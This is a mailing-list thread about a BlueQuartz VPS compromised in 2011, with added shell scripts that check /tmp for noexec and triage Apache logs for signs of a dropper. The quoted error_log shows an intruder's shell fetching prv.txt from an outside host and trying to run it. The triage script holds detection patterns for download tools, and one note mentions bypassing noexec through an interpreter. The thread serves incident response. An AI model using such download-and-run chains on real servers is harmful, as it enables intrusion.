[BlueOnyx:08833] Re: vps hacked
Steffan
general at ziggo.nl
Fri Oct 14 03:39:59 -05 2011
Hello Tobias,
On a VPS, /tmp is not a different mount point
(standard solarspeed install):
[root at server4 /]# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/simfs 119G 90G 29G 77% /
none 2.4G 16K 2.4G 1% /dev
-----Original Message-----
From: blueonyx-bounces at mail.blueonyx.it
[mailto:blueonyx-bounces at mail.blueonyx.it] On Behalf Of Tobias Gablunsky
Sent: Thursday, October 13, 2011 16:44
To: BlueOnyx General Mailing List
Subject: [BlueOnyx:08827] Re: vps hacked
Hello Steffan,
whenever I had such issues, the file was downloaded to /tmp.
If you use the standard mounting policy, this directory is mounted noexec
and the script could be downloaded but not executed. So you would have been
lucky - I cross my fingers.
Kind regards,
Tobias Gablunsky
Server Technology
Server Management
____________________________________________
CBXNET combox internet GmbH
Lützowstr. 106 | 10785 Berlin
Tel: +49 (30) 5900 69-41
Fax: +49 (30) 5900 69-99
www.cbxnet.de
Event Connect - Internet for your event!
Tel: +49 (30) 5900 69-80
www.event-connect.de
Berlin-Charlottenburg District Court, HRB 71171
Managing Director: Lutz Treutler
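Tobias's point (a separately mounted /tmp with noexec) and Steffan's df output (no separate /tmp on the simfs VPS) both come down to one question: which mount actually covers /tmp, and does it carry noexec? The script below is an added example, not code from the thread or from BlueOnyx. It parses /proc/mounts text, picks the longest mount point that is a prefix of the path, and reads the options from there; the two /proc/mounts samples are constructed to mirror the VPS case and a hardened host.

```shell
#!/bin/sh
# Added example, not code from the thread or from BlueOnyx: work out which
# mount a path such as /tmp really lives on and whether that mount carries
# "noexec". The functions take the text of /proc/mounts as an argument so
# they can be run on the live file or on the constructed copies below.

# mount_for_path MOUNTS_TEXT PATH
# Prints "<mountpoint> <options>" of the longest mount point that is a
# prefix of PATH. A path that is not its own mount point inherits the
# options of its parent, which is the situation in Steffan's df output:
# /tmp is just a directory on /dev/simfs mounted at /.
mount_for_path() {
    printf '%s\n' "$1" | awk -v p="$2" '
        {
            mp = $2
            if (mp == "/" || p == mp || index(p, mp "/") == 1) {
                if (length(mp) > best_len) {
                    best_len = length(mp); best = mp; opts = $4
                }
            }
        }
        END { if (best != "") print best, opts }'
}

# path_is_noexec MOUNTS_TEXT PATH
# Exit 0 when the covering mount has noexec, 1 when it does not,
# 2 when no mount covers PATH at all.
path_is_noexec() {
    covering=$(mount_for_path "$1" "$2")
    [ -n "$covering" ] || return 2
    case ",${covering#* }," in
        *,noexec,*) return 0 ;;
        *)          return 1 ;;
    esac
}

# Constructed /proc/mounts for an OpenVZ-style VPS like the one in the
# thread: only / (simfs) and /dev are mounts, so /tmp inherits the options
# of / and the noexec policy Tobias mentions cannot apply to it.
VPS_MOUNTS='/dev/simfs / simfs rw,relatime 0 0
none /dev tmpfs rw,relatime 0 0
proc /proc proc rw,relatime 0 0'

# Constructed /proc/mounts for a host where /tmp is its own hardened mount.
HARDENED_MOUNTS='/dev/sda1 / ext3 rw,relatime 0 0
/dev/sda3 /tmp ext3 rw,nosuid,nodev,noexec,relatime 0 0
none /dev tmpfs rw,relatime 0 0'

# report MOUNTS_TEXT PATH: one-line verdict for humans
report() {
    if path_is_noexec "$1" "$2"; then
        echo "$2: noexec (covered by: $(mount_for_path "$1" "$2"))"
    else
        echo "$2: NOT noexec (covered by: $(mount_for_path "$1" "$2"))"
    fi
}

report "$VPS_MOUNTS" /tmp
report "$HARDENED_MOUNTS" /tmp
# Same check against the running system, when /proc/mounts is readable.
[ -r /proc/mounts ] && report "$(cat /proc/mounts)" /tmp
```

On a box where /tmp is only a directory on /, the usual workaround is a bind mount (`mount --bind /tmp /tmp` followed by `mount -o remount,noexec,nosuid,nodev /tmp`); whether a VPS container permits that depends on the virtualisation in use, so treat it as something to test rather than assume. Two caveats worth keeping in mind: noexec only blocks running the file directly (`./prv.txt`), not feeding it to an interpreter (`sh prv.txt`, `perl prv.txt`), and wget saves into the working directory of the process that spawned it, which is not necessarily /tmp.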
________________________________
From: blueonyx-bounces at mail.blueonyx.it
[mailto:blueonyx-bounces at mail.blueonyx.it] On Behalf Of Steffan
Sent: Thursday, October 13, 2011 2:07 PM
To: blueonyx at blueonyx.it
Subject: [BlueOnyx:08816] vps hacked
I still have a client with a BlueQuartz server (VPS).
This morning the virtual server was hacked.
I looked in the logs and found this in /var/log/httpd/error_log:
[Wed Oct 12 00:07:13 2011] [error] [client 220.181.125.72] no
acceptable variant: /usr/sausalito/ui/web/error/fileNotFound.html
--00:07:40-- http://rapha.altervista.org/prv.txt
=> `prv.txt'
Resolving rapha.altervista.org... 46.4.65.68
Connecting to rapha.altervista.org|46.4.65.68|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28,039 (27K) [text/plain]
0K .......... .......... ....... 100%
1015.53 KB/s
00:07:40 (1015.53 KB/s) - `prv.txt' saved [28039/28039]
sh: line 1: lwp-downlod: command not found
sh: line 1: fetch: command not found
sh: line 2: rapha.altervista.org/prv.txt: No such file or directory
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
 14 28039   14  4097    0     0  98324      0 --:--:-- --:--:-- --:--:-- 98324
100 28039  100 28039    0     0   403k      0 --:--:-- --:--:-- --:--:--  899k
sh: line 3: prv.txt: command not found
--00:07:40-- http://rapha.altervista.org/prv.txt
=> `prv.txt'
Resolving rapha.altervista.org... 46.4.65.68
Connecting to rapha.altervista.org|46.4.65.68|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28,039 (27K) [text/plain]
0K .......... .......... ....... 100%
1020.34 KB/s
00:07:40 (1020.34 KB/s) - `prv.txt' saved [28039/28039]
sh: line 1: lwp-downlod: command not found
sh: line 1: fetch: command not found
sh: line 2: rapha.altervista.org/prv.txt: No such file or directory
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  4 28039    4  1201    0     0  42493      0 --:--:-- --:--:-- --:--:-- 42493
100 28039  100 28039    0     0   507k      0 --:--:-- --:--:-- --:--:-- 1048k
sh: line 3: prv.txt: command not found
I don't see any admin logins.
How can I find out what happened?
I don't see anything weird in the access log or message log.
Thanks, Steffan
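To the question of how to find out what happened: the wget and curl output and the `sh: line N: ...: command not found` lines in error_log are not httpd messages at all. They are the stderr of a child process (CGI, PHP, SSI) that ran a shell, which tried lwp-download, fetch, wget and curl in turn to fetch prv.txt and then run it. The script below is an added example, not code from the thread or from BlueOnyx: it separates child-process stderr from regular httpd records, flags the download-tool footprint, extracts the minute of the download and lists which clients were hitting the server in that minute. Both log files are constructed samples; the client IP, host and file name come from the thread, but the access_log request lines are placeholders and say nothing about the real entry point.

```shell
#!/bin/sh
# Added example, not code from the thread or from BlueOnyx: triage an Apache
# error_log for the footprint of a "fetch a script, then run it" dropper
# like the one in Steffan's log, and list which clients were talking to the
# server in the minute it happened. Anything that reaches error_log without
# the "[date] [level] [client ip]" prefix is stderr of a child process (CGI,
# PHP, SSI), which is how wget/curl progress output and "sh: line N: ...:
# command not found" end up there. Both logs below are constructed samples:
# the client IP, host and file name are taken from the thread; the access_log
# request lines are placeholders and do not describe the real entry point.

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

cat > "$WORK/error_log" <<'EOF'
[Wed Oct 12 00:07:13 2011] [error] [client 220.181.125.72] no acceptable variant: /usr/sausalito/ui/web/error/fileNotFound.html
--00:07:40--  http://rapha.altervista.org/prv.txt
           => `prv.txt'
Resolving rapha.altervista.org... 46.4.65.68
Connecting to rapha.altervista.org|46.4.65.68|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28,039 (27K) [text/plain]
00:07:40 (1015.53 KB/s) - `prv.txt' saved [28039/28039]
sh: line 1: lwp-downlod: command not found
sh: line 1: fetch: command not found
sh: line 2: rapha.altervista.org/prv.txt: No such file or directory
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
100 28039  100 28039    0     0   403k      0 --:--:-- --:--:-- --:--:--  899k
sh: line 3: prv.txt: command not found
[Wed Oct 12 00:09:02 2011] [error] [client 10.0.0.5] File does not exist: /home/sites/site1/web/favicon.ico
EOF

# Placeholder access_log: the paths are invented, only the IP and minute matter.
cat > "$WORK/access_log" <<'EOF'
220.181.125.72 - - [12/Oct/2011:00:07:13 +0200] "GET /nonexistent HTTP/1.1" 404 312 "-" "Mozilla/4.0"
220.181.125.72 - - [12/Oct/2011:00:07:39 +0200] "POST /placeholder HTTP/1.1" 200 48 "-" "Mozilla/4.0"
10.0.0.5 - - [12/Oct/2011:00:07:41 +0200] "GET /index.html HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Oct/2011:00:09:02 +0200] "GET /favicon.ico HTTP/1.1" 404 298 "-" "Mozilla/5.0"
EOF

# child_stderr FILE: every line that is not a regular httpd log record
child_stderr() {
    grep -Ev '^\[[A-Z][a-z]{2} [A-Z][a-z]{2} [ 0-9][0-9] [0-9:]+ [0-9]{4}\] \[' "$1"
}

# dropper_hits FILE: child stderr that looks like a download tool, or a shell
# that failed to find one (the lwp-download/fetch/wget/curl fallback chain).
dropper_hits() {
    child_stderr "$1" | grep -E \
        '^--[0-9]{2}:[0-9]{2}:[0-9]{2}--|^Resolving |^Connecting to |^HTTP request sent|saved \[[0-9]+/[0-9]+\]|^sh: line [0-9]+: .*: (command not found|No such file or directory)|^ *% Total'
}

count_dropper_hits() { dropper_hits "$1" | wc -l | tr -d ' '; }

# hit_minutes FILE: the HH:MM at which a download completed, one per line.
# wget's stderr carries no date, so the date must be taken from the
# surrounding httpd records by hand (see attacker_candidates).
hit_minutes() {
    dropper_hits "$1" |
        sed -n 's/^\([0-9][0-9]:[0-9][0-9]\):[0-9][0-9] (.*) - .*saved.*/\1/p' | sort -u
}

# requests_in_minute ACCESS_LOG DD/Mon/YYYY HH:MM: "<count> <ip>", busiest first
requests_in_minute() {
    grep -F "[$2:$3:" "$1" | awk '{print $1}' | sort | uniq -c | sort -rn |
        awk '{print $1, $2}'
}

# attacker_candidates ERROR_LOG ACCESS_LOG DD/Mon/YYYY: clients seen in each
# minute a download completed
attacker_candidates() {
    for m in $(hit_minutes "$1"); do
        requests_in_minute "$2" "$3" "$m"
    done
}

echo "== dropper footprint in error_log"
dropper_hits "$WORK/error_log"
echo "== requests per client in the minute(s) of the download"
attacker_candidates "$WORK/error_log" "$WORK/access_log" 12/Oct/2011
```

On the real server the same functions run against /var/log/httpd/error_log and the per-site access logs; the client that is busiest in the download minute is the first candidate, and its earlier requests show what it was probing. Beyond the logs, wget saves to the working directory of the process that spawned the shell, so look for prv.txt there as well as in /tmp, and check what the web server user is running (`ps -u <webserver user>`), since a script fetched this way typically keeps running after the request ends.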
_______________________________________________
Blueonyx mailing list
Blueonyx at mail.blueonyx.it
http://mail.blueonyx.it/mailman/listinfo/blueonyx